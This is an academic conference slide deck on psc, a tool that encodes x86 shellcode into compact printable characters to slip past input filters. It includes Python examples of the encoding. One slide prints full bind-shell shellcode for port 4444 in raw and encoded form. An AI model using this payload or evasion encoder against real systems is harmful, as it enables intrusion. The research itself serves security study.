Automatic Generation of Compact Printable Shellcodes for x86
WOOT '20
Dhrumil Patel, Aditya Basu, Anish Mathuria
August 11, 2020

Outline
- Introduction
- Currently used algorithms
- Motivation
- Printable Shellcode Compiler (psc)
- Results
- Conclusion
Printable Shellcodes
- Defensive filters strip all non-printable characters from input. This ruins most injection attacks.
- Attacker's goal: generate code that consists only of the printable characters
    0123456789
    ABCDEFGHIJKLMNOPQRSTUVWXYZ
    abcdefghijklmnopqrstuvwxyz
    !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
Currently Used Algorithms

Riley Eller algorithm
- "Any dword (4 bytes) can be derived from two or three SUB instructions whose operands are printable bytes"
- Available as a Metasploit plugin
- Example: the bytes 0x89 0xe3 0xcd 0x80 from an execve /bin/sh shellcode become
      # constants are printable (0x21-0x7E)
      sub $0x256d6d2d, %eax
      sub $0x256d6d25, %eax
      sub $0x34574225, %eax
      push %eax
- Each byte is encoded with ≈ 2.5 bytes

Source-to-source conversion
- Géczi and Iványi replace all non-printable instructions with a sequence of printable instruction(s)
- Example: 38-byte shellcode → 9837-byte printable shellcode
- Not publicly available
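To see why the three SUB instructions on this slide write the bytes 0x89 0xe3 0xcd 0x80, the following added example (not code from the paper or its repository) emulates the chain with 32-bit wrap-around, assembles the instruction bytes, and checks that every byte lies in the range 0x21-0x7E that the slide calls printable. It assumes EAX holds zero before the first SUB, which the slide's listing does not show; the function names are this example's own.

```python
# Added example: emulate a Riley Eller style SUB chain and check printability.
# Not code from the paper or its repository; EAX = 0 at the start is an assumption.

MASK32 = 0xFFFFFFFF
PRINTABLE = range(0x21, 0x7F)          # 0x21..0x7E, as on the slide

OP_SUB_EAX_IMM32 = 0x2D                # 'sub $imm32, %eax' opcode byte ('-')
OP_PUSH_EAX = 0x50                     # 'push %eax' opcode byte ('P')


def is_printable(data: bytes) -> bool:
    """True if every byte would survive a filter that keeps only 0x21-0x7E."""
    return all(b in PRINTABLE for b in data)


def apply_sub_chain(operands, eax: int = 0) -> int:
    """Return EAX after executing 'sub $imm, %eax' for each operand (mod 2**32)."""
    for imm in operands:
        eax = (eax - imm) & MASK32
    return eax


def pushed_bytes(operands, eax: int = 0) -> bytes:
    """The 4 bytes a trailing 'push %eax' writes to the stack (little-endian)."""
    return apply_sub_chain(operands, eax).to_bytes(4, "little")


def assemble_sub_chain(operands) -> bytes:
    """Machine code for the SUB chain followed by PUSH EAX."""
    code = bytearray()
    for imm in operands:
        code.append(OP_SUB_EAX_IMM32)
        code += imm.to_bytes(4, "little")   # immediates are stored little-endian
    code.append(OP_PUSH_EAX)
    return bytes(code)


# The operands from the slide's execve /bin/sh example.
SLIDE_OPERANDS = [0x256D6D2D, 0x256D6D25, 0x34574225]

if __name__ == "__main__":
    code = assemble_sub_chain(SLIDE_OPERANDS)
    print("dword written by push:", pushed_bytes(SLIDE_OPERANDS).hex())  # 89e3cd80
    print("instruction bytes    :", code.decode("ascii"))
    print("all printable        :", is_printable(code))
    print("expansion            :", len(code), "bytes for 4 original bytes")
```

Both the opcodes (0x2D is '-', 0x50 is 'P') and the immediates survive a printable-only filter, while the four target bytes themselves do not; the 16-byte sequence for one 4-byte dword is where the size growth of this approach comes from.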
We Need Compact Shellcodes
- Transforming to printable ⇒ increases shellcode size
- Size restrictions on input
- Example: buffer overflow exploits are limited by the buffer size.

Printable Shellcode Compiler
- Overview
- Encoding scheme
- Runtime decoder
- Testing

psc: Printable Shellcode Compiler
- Arbitrary shellcode → printable shellcode
- Special encoding scheme
- Hand-crafted decoder that is printable

Layout of the printable shellcode:
  Decoder (size = 146 bytes): custom decoder loop, XOR, patcher
  Encoded payload (size = 73 bytes): the encoded shellcode
psc Encoding Scheme
Two original bytes are packed into three encoded bytes.
  Original byte #1: bits b0 b1 b2 b3 b4 b5 b6 b7
  Original byte #2: bits b8 b9 b10 b11 b12 b13 b14 b15
  Encoded B1 = 0x3F + (0 0 0 0 b0 b1 b2 b3)
  Encoded B2 = 0x3F + (0 0 b4 b5 b6 b7 b8 b9)
  Encoded B3 = 0x3F + (0 0 b10 b11 b12 b13 b14 b15)
Range of encoded bytes ∈ (0x3F, 0x7E)

psc Runtime Decoding
Initializer:
  ECX: read pointer (encoded payload)
  EDX: write pointer (recovered shellcode)
Loop:
  Let B1 ← [ECX], B2 ← [ECX + 1], B3 ← [ECX + 2]
  If B1 = 0x26 (read '&'): jump to the recovered shellcode
  Otherwise:
    Recover first byte,  R1 ← (B1 << 4) + ((B2 & 0x3F) >> 2)
    Recover second byte, R2 ← (B2 << 6) + (B3 & 0x3F)
    Write R1 to [EDX], write R2 to [EDX + 1]
    EDX ← EDX + 2
    ECX ← ECX + 3
3 bytes of encoded payload → 2 bytes of recovered shellcode
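The encoding and decoding of the two slides above, written out as an added example in Python (not the paper's own encoder, which lives in the linked repository): two original bytes become three bytes in the range 0x3F-0x7E, the payload ends with '&' (0x26), and the decoder inverts the packing. The decoder here subtracts the 0x3F offset before applying the shifts; the slide's formulas write the recombination without that step. The sample input is all 256 byte values, constructed here so that every value is seen to round-trip and every encoded byte to pass a printable-only filter; the function names and the even-length requirement are this example's own.

```python
# Added example of the psc 2-byte -> 3-byte packing; not the project's own code.

OFFSET = 0x3F          # every encoded byte is 0x3F + a 4- or 6-bit value
TERMINATOR = 0x26      # '&', below 0x3F so it can never be a valid B1


def psc_encode(shellcode: bytes) -> bytes:
    """Pack each pair of bytes into three bytes in 0x3F..0x7E, then append '&'."""
    if len(shellcode) % 2:
        raise ValueError("even-length input required (the slides define no padding)")
    out = bytearray()
    for i in range(0, len(shellcode), 2):
        a, b = shellcode[i], shellcode[i + 1]
        out.append(OFFSET + (a >> 4))                         # b0..b3
        out.append(OFFSET + (((a & 0x0F) << 2) | (b >> 6)))   # b4..b9
        out.append(OFFSET + (b & 0x3F))                       # b10..b15
    out.append(TERMINATOR)
    return bytes(out)


def psc_decode(encoded: bytes) -> bytes:
    """Mirror the runtime decoder loop: read 3 bytes, write 2, stop at '&'."""
    out = bytearray()
    rp = 0                                  # ECX, the read pointer
    while True:
        b1 = encoded[rp]
        if b1 == TERMINATOR:
            return bytes(out)               # where the decoder jumps to the payload
        n1 = b1 - OFFSET                    # strip the 0x3F offset first
        n2 = encoded[rp + 1] - OFFSET
        n3 = encoded[rp + 2] - OFFSET
        out.append(((n1 << 4) | (n2 >> 2)) & 0xFF)        # R1
        out.append((((n2 & 0x03) << 6) | n3) & 0xFF)      # R2
        rp += 3                                           # ECX <- ECX + 3


def encoded_alphabet_ok(encoded: bytes) -> bool:
    """Every byte before the terminator lies in the slide's range 0x3F..0x7E."""
    return all(0x3F <= b <= 0x7E for b in encoded[:-1]) and encoded[-1] == TERMINATOR


def expansion_ratio(shellcode: bytes) -> float:
    """Encoded bytes (terminator excluded) per original byte; 1.5 as the slides state."""
    return (len(psc_encode(shellcode)) - 1) / len(shellcode)


SAMPLE = bytes(range(256))   # constructed input: every byte value exactly once

if __name__ == "__main__":
    enc = psc_encode(SAMPLE)
    print("encoded", len(SAMPLE), "bytes into", len(enc), "bytes")
    print("alphabet ok:", encoded_alphabet_ok(enc))
    print("round trip :", psc_decode(enc) == SAMPLE)
    print("ratio      :", expansion_ratio(SAMPLE))
```

Because B1 only carries four bits, its value is always in 0x3F..0x4E, so the '&' terminator (0x26) can never be confused with payload, which is what lets the decoder loop stop without a length counter.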
Testing
Decoder: custom decoder loop, XOR, patcher
Encoded payload (size = 73 bytes)
For testing: SIGTERM is used so that a signal handler can check
  recovered shellcode == original shellcode
psc In Action
Shellcode to spawn a shell on 4444/TCP (binary):
  \x31\xc0\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1
  \xb0\x66\xcd\x80\x97\x31\xc0\x43\x50\x66\x68
  \x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x57\x89
  \xe1\xb0\x66\xcd\x80\x50\x57\x89\xe1\xb0\x66
  \x83\xc3\x02\xcd\x80\x50\x50\x57\x89\xe1\x04
  \x66\x43\xcd\x80\x93\x31\xc0\x31\xc9\xb1\x02
  \xb0\x3f\xcd\x80\x49\x79\xf9\x50\x66\x68\x73
  \x68\x68\x2f\x2f\x62\x61\x68\x2f\x62\x69\x6e
  \x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd
  \x80
Binary to printable:
  `PYj0X40HP[j0X0Y50AO0YO0Y`0
  Aa0Ya0Ab0Yi0Aj0Y
  j0Ak0Ym0Yn
  rII0Y70A80Y80A90Y=0Y>0YGQZOyI&t<j0X40P[2
  YIC?,42AJ@$<?'20'wBIj0X40P[2YJC2AK@?,6$
  ?0'wBJBBAAAuAa5he4`i/DZ2Fu4XR5gA7f`;u?4}
  V8Mo5XU5Xg/Sx5XR7f`5gO4DV7f`;u?:@e:
  KC4XV7f`;u?:@e3LU4XV7f`;u?4dX:CA8Mo2~
  L7@H6fx:?J5_n1|r5`g1|a5dm7fb3EH;jL7AO&
Find it at https://github.com/dhrumil29699/Printable-Encoder/
Results
- Encoding performance
- Total output size

Results: Only Encoded Shellcode
[Bar chart: Encoding Performance. Series: Original, Riley Eller, psc. Shellcodes: shell on 8080/TCP over SSL; HTTP server on 8800/TCP; download file & execute; shell on 4444/TCP; copy /etc/passwd; add root user; execve /bin/sh. x-axis: size in bytes, 0 to 2000.]
psc encoding is more compact than the Riley Eller algorithm.

Results: Decoder & Encoded Shellcode
[Bar chart: Total Output Size. Series: Original, Riley Eller, psc. Shellcodes: shell on 8080/TCP over SSL; HTTP server on 8800/TCP; download file & execute; shell on 4444/TCP; copy /etc/passwd; add root user; execve /bin/sh. x-axis: size in bytes, 0 to 2000.]
For large shellcodes, psc beats the Riley Eller algorithm.
psc vs ALPHA3
- psc encoding outperforms ALPHA3: ALPHA3 changes 1 byte → 2 bytes; psc changes 1 byte → 1.5 bytes.
- However, the compact encoding makes our decoder complicated.
- psc beats ALPHA3 for larger shellcodes (size > 236 bytes).

Concluding Remarks
- We present a new encoding algorithm that uses looped decoding to reduce the size of auto-generated printable shellcodes.
- We produce about 40%-50% smaller printable shellcodes compared to the Riley Eller algorithm.
Future plan
- Add support for x86_64 shellcodes
References
- Riley Eller. Bypassing MSB Data Filters for Buffer Overflow Exploits on Intel Platforms. http://julianor.tripod.com/bc/bypass-msb.txt
- Zsolt Géczi and Peter Iványi (2018). Automatic translation of assembly shellcodes to printable byte codes. Pollack Periodica 13(4), 3-20.
- B.J. Wever. ALPHA3. https://github.com/SkyLined/alpha3

Thanks!
Dhrumil Patel, DevOps at Acko Technology and Services Private Ltd., 201601228@daiict.ac.in
Aditya Basu, PhD student at Penn State, aditya.basu@psu.edu
Anish Mathuria, Professor at DA-IICT, anish_mathuria@daiict.ac.in